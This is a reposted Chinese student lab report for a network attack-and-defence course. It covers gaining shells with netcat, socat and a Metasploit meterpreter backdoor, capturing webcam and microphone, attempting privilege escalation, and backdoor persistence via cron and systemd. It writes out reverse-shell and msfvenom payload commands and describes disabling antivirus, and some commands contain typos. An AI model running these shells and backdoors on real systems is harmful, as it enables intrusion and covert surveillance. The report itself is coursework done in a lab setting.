#20232408 2025-2026-1 《网络与系统攻防技术》实验二实验报告 - 20232408

news/2025/10/19 19:36:50/文章来源:https://www.cnblogs.com/20232408lyc/p/19151294

实 验 报 告

课程名称: 网络与系统攻防技术
实验序号: 实验一
实验名称: 缓冲区溢出攻击
学 号: 20232408
姓 名: 李易骋
指导老师: 王志强
必修/选修: 选修
实验日期: 2025.10.15

一、实验目的

** 学习ncat/socat/MSF等有关后门程序的基本应用使用发放,使用以上后门并远程控制另一主机,获取目标主机音频、摄像头、击键记录等内容,并尝试提权。

二、实验内容

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

  1. 基础环境

    kali虚拟机,具体配置如下:

图片1

  1. 实验过程
    **
    4.1使用netcat获取主机的Shell

    4.1.1 在windows系统中下载ncat.exe,配置环境

    在网址https://eternallybored.org/misc/netcat/中下载ncat,打开“系统环境变量”配置环境。

    4.1.2 关闭防火墙,否则会被查杀。

    在系统设置中关闭防火墙,根据所使用的网络类型来。

图片2

4.1.3 获得主机shell。

先ipconfig获得主机ip地址。

图片3

然后在windows端启动端口号8888监听。nc -l -p 8888

在kali端切换成root用户之后, 输入命令nc 192.168.119.1 8888 -e /bin/sh,获得主机shell。

图片4

图中可以看到,反过来也是一样的,就是windows传递shell,kali去监听也是可行的。

图片5

 4.1.4启动定时任务

写了一个my.corn,相隔5s输出当前时间。

图片6

图片7

4.2使用socat来获取主机shell

4.2.1下载socat

可去namp官网下载socat安装包。

关闭防火墙。

4.2.2 启动主机监听/传输shell命令

同样,这里是kali启动监听,windows传输cmd.exe,kali获取windows的shell。

图片8

命令是socat.exe TCP:192.168.119.128:455 EXEC:cnd.exe,pty

socat TCP-LISTEN:4455,reuseaddr,fork-

同样写入计时cron任务。

图片9

4.3 使用MSF meterpreter,获得主机shell,控制摄像头等。

4.3.1 下载MSF meterpreter

要关闭防火墙下载。

4.3.2 生成MSF后门文件并且传输

msfvenom -p windows/meterpreter/reverse\_tcp LHOST=192.168.119.128 LPORT=4568 -f exe > backdoor20232408.exe
这里与之前不同的是,此处是windows先开监听,kali再开监听,通过“发过去”的后门程序反弹回主机shell。

socat.exe TCP-LISTEN:4568455,reuseaddr - > backdoor20232408.exe

socat FILE:/var/www/html/backdoor20232408.exe TCP:192.168.119.1:4568

4.3.3 msfconsole执行主机命令,控制摄像头/录音

生成文件之后,msfconsole -q进入控制界面。执行以下命令:

`use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.119.128

set LPORT 4568`

图片10

图片11

可以通过webcam\_snap来拍张照。或者使用record\_mic来录个音。

图片12

图片13

4.3.4 尝试提权

使用命令getsystem,发现无法提权,仍然是此用户。在物理机中关闭了所有的安全保护,包括UAC等,都没有用。分析原因:只有一个会话,而且无法切换,存在内核保护。

图片14

  1. 问题以及解决
  2. 后门程序被连续杀死,无法传输/无法运行。

原因是防火墙开启/病毒保护开启。注意在病毒保护中要把实时保护关闭,不然即使允许了“这一次的程序执行”,也会杀死“下一次的程序执行”。可以把文件放在可执行区,但是依旧要关闭实时保护。

  1. 摄像功能异常

我在进行摄像测试时,发现照片一直是黑的。我以为是内核保护或者禁止访问,后来发现其实是电脑旁边有个小按钮,按一下才能开摄像头。

  1. screenshot一直显示超时

    这个问题始终没有解决,原因在于windows11家庭版 24H3对非本机调用内核截屏有着非常严格、无法绕过的控制我试过,关闭Defender、降内核隔离、禁用UAC + SYSTEM,全都以失败告终。

六、回答问题

6.1 列举你能想到的一个后门进入到你系统中的可能方式

可能会以一个伪装的网站的形式,我们去找官网的时候会不小心点进去,然后被植入后门程序。

    6.2 列举你知道的后门如何启动起来(windows及linux)的方式

Windows:很多后门程序是开机启动的。还有的是通过schtasks命令创建定时任务,设置后门程序在特定时间或触发条件下自动运行。

Linux:

1.启动脚本:将后门程序路径添加到/etc/rc.local(部分系统需确保文件可执行)、/etc/profile或用户目录下的.bashrc等脚本文件中,系统启动或用户登录时脚本会自动执行后门。

2.系统服务:在/etc/systemd/system/目录下创建后门服务的.service文件,配置ExecStart为后门程序路径,再通过systemctl enable设置开机自启,systemctl start启动服务。

3.Crontab 定时任务:通过crontab -e编辑定时任务列表,添加如* * * * * /path/backdoor的命令,设置后门程序按分钟、小时等周期自动运行。

6.3  Meterpreter有哪些给你映像深刻的功能

它能控制摄像头、麦克风,能够毫不费力得到shell,是很可怕的,也难怪现在的windows系统对它严防死守,只要看到相应的特征就会毫不犹豫杀掉。我们使用时必须在合法授权环境下使用,也要小心防御。

6.4 如何发现自己有系统有没有被安装后门

可以借助杀毒软件,它们比较专业。也可以查看自己进程,是否对外有陌生的连接。还可以分析是否有异常的定时计划。

七、实验体会

后门程序得到这个实验很好玩,我们能够想象到,通过一个程序去控制其他主机、得到我们需要的信息,这是一件很“技术”的事情。但是我们的电脑也有被这样入侵的风险,尤其是我们自己不注意防范的时候。现代的后门技术越来越发达,固然难以防范,但是如果我们养成良好的网络防御意识,比如说不轻易点开陌生邮件,不点击不明来源网站等等,我们是可以在一定程度上限制被入侵的。在实验中碰到很多问题,大部分解决了,但是还有一个screenshot的问题花费了我两个晚上还是没解决。通过这次实验,我深刻学习了后门程序得到原理与应用,也对这种行为有了更加深入的认识。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/940557.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

UML图与数据流图

UML图与数据流图UML(Unified Modeling Language,统一建模语言)是一种标准化的图形化建模语言,用于描述软件系统的结构和行为。它主要用于软件工程领域,帮助开发团队以清晰、直观的方式表达系统的设计。 UML图的特…

一文读懂Schnorr签名

Schnorr签名——比特币的“魔法签名”是怎么工作的? 今天我们来聊一个超级酷的东西——Schnorr签名!它就像比特币世界的“魔法笔”,用来确保你的比特币交易安全又省空间。别担心,我会用最简单的方式解释,连小学生…

题解:P2672 [NOIP 2015 普及组] 推销员

题目传送门 是道很好的题 代码实现难度很低很低 但是基础的思维量还是能保证的 但是建议调绿 十五分钟就写完了 关键词:贪心、前后缀先简化题意 给出两个数列 \(疲惫_i\) 、 \(路程_i\) 他们的编号构成集合 \(S\) \[\…

如何选择合适的SAP实施公司?3步锁定靠谱的SAP服务商

企业选SAP实施商需参排名、查案例、实地验;上海达策20年深耕,超3.4万客户覆盖多行业,凭专业成本土可靠实施公司。在数字化转型浪潮下,企业管理软件的重要性日益凸显。作为全球领先的企业资源规划(ERP)系统,SAP凭…

论DCT和IDCT的重要性,汇编SIMD版第一,此贴第二,就是这么狂 :-)

输入: [1.000 2.000 3.000]输出: [ 3.464 -1.414 0.000]重建: [1.000 2.000 3.000] [0] cos(0.0*π/3)*sqrt(1/N)*1.0 + cos(0.0*π/3)*sqrt(1/N)*2.0 + cos(0.0*π/3)*sqrt(1/N)*3.0 = 3.464[1] cos(0.5*π/3)*sqrt(…

这些SAP实施公司哪家强?国内比较好的SAP实施商推荐

国内 SAP 实施公司的选择需重点考察官方认证资质、行业经验及客户案例国内SAP实施公司的选择需重点考察官方认证资质、行业经验及客户案例。以下是综合比较突出的服务商: 上海达策信息技术有限公司 上海达策信息技术有…

25秋周总结5

总结 这周以及上周的最后几天机房一直在互相讲课,现在除了我的内容还差 \(1\over3\) 其他人的内容基本都讲完了。各个板块的讲课都不错,讲课的内容有逻辑、有分类,但是我认为一些同学的课件里面缺少对一些 tricks 的…

博士研究文档管理技术指南

本文详细介绍了博士研究中如何系统管理文献阅读、会议记录、实验跟踪和学术社交的技术方法,包括使用BibTeX管理文献、Git版本控制、实验日志记录等实用技巧,帮助研究人员提高工作效率。博士研究文档管理——跟踪会议…

10/19

UML建模的三部分 事物、关系、图

apisix升级完整流程

Apache APISIX 2.15.3 完整安装指南 一、环境要求组件 最低版本 验证命令 说明etcd 3.5.x etcdctl version 配置中心OpenResty 1.19.x openresty -v 运行环境LuaRocks 3.x luarocks --version Lua包管理工具APISIX 2.1…

10.11-10.18 一周总结

10.11-10.18 一周总结 10.11 比赛 100+100+45+10=255,\(A,B\) 题比较顺利的解决了。\(C\) 题想到了一些与正解相关的地方,但是还差一些地方没有想到。\(D\) 题是一个轮廓线 dp,同时加上一些组合意义就可以解决,没有…

10/19/2025 一周总结

10/13/2025 杂题 单位根反演: \[[n \mid k] = \frac{1}{n} \sum\limits_{i=0}^{n-1} \omega_{n}^{ik} \]在模意义下,可以取 \(\omega_{n}^{1} = g^{\frac{mod-1}{n}}\),其中 \(g\) 为原根。 10/14/2025 模拟赛 T1 没…

程序员做视频难在哪?可能是文案这一关

程序员做技术分享视频,最难的往往不是技术本身,而是如何写出吸引人的视频文案。本文介绍了一个实用的AI提示词模板,专门用于生成B站视频文案脚本。该工具通过结构化的提示词,帮助创作者生成包括开场设计、内容分段…

题解:P12128 [蓝桥杯 2024 省 B 第二场] 质数变革

link 很显然,这道题根本不需要根号分治,直接离线存下来一起修改就行。 我就来讲一下这道题为什么不用根号分治复杂度是对的吧。 如何暴力 显然可以把每次修改看做排名 \(+x\) 或 \(-x\) 的操作,又因为这些修改的方式…

题解:P12003 在小小的奶龙山里面挖呀挖呀挖(加强版)

link 这是一篇空间上真正理解出题人意图的题解,具体表现在利用得很充分。 \(949.64\) MB 正文 我们都知道对于一个数 \(a\) 最多有有 \(1\) 个大于 \(\sqrt a\) 的质因数,大概可以想到根号分治,把一个数的质因数按照…

如何生成逼真的合成表格数据:独立采样与关联建模方法对比

在数据科学的实际工作中,我们经常会遇到这样的情况:手头的真实数据要么不够用,要么因为隐私合规问题无法直接使用,但这些数据往往包含重要的统计规律,但直接拿来做实验或测试却十分的麻烦。 这时候合成数据就派上…

winform+Task+async

一个有意思的问题: 假设一个winform程序,需要运行异步任务进行业务处理,那么最常见的实践方式是怎样的? 那肯定是task+async呀,对,就是这样,但如果想让windows 挂载这个程序,使用命令行运行,那么原有的方法还…

AI元人文:跨学科视野下的人工智能伦理新范式

AI元人文:跨学科视野下的人工智能伦理新范式 引言 在人工智能技术快速发展的当下,传统"价值对齐"方法在应对复杂伦理问题时显现出局限性。基于规则逻辑的AI伦理框架难以有效处理现实世界中多元价值的动态博…

Rust 开发最佳实践(Rustlang Best Practices)

Rust 开发最佳实践(Rustlang Best Practices) Rust 是一门系统编程语言,强调安全性、并发性和性能。为了充分发挥 Rust 的优势,开发者应遵循一系列最佳实践,涵盖代码结构、错误处理、并发、测试、文档和性能优化等…